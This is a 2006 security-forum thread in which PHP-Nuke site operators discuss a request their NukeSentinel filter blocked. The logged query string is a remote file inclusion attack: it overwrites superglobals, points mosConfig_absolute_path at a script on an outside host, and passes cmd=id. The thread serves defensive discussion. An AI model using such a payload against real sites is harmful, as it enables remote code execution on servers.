Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
manunkind
Client


Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM

PostPosted: Wed Aug 16, 2006 6:04 am Reply with quote

NukeSentinel just caught something that I have never seen before:

Code:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)


Query String: Only registered users can see links on this board! Get registered or login!
&_REQUEST[option]=com_content
&_REQUEST[Itemid]=1
&GLOBALS=
&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?
&cmd=id

Get String: Only registered users can see links on this board! Get registered or login!
&GLOBALS=
&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?
&cmd=id

Post String: Only registered users can see links on this board! Get registered or login!


I've always seen the UNION attacks and the misc filter attacks by passing another URL through, but I have never seen something like this before. It looks like they are pulling some kind of info and uploading it to their server?

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Wed Aug 16, 2006 7:10 am Reply with quote

Yeah, I just started seeing the use of the superglobal arrays getting caught just recently.

It is a trade-off. Some folks complain that "valid" requests are getting blocked (several forum threads here) and yet, the block in question has just caught this one... trade-offs, trade-offs... (as a very wise person just told me today in an email...)

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Wed Aug 16, 2006 1:01 pm Reply with quote

Indeed they are using either a Mambo or Joomla exploit, and probably from another hacked Mambo/Joomla system too

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©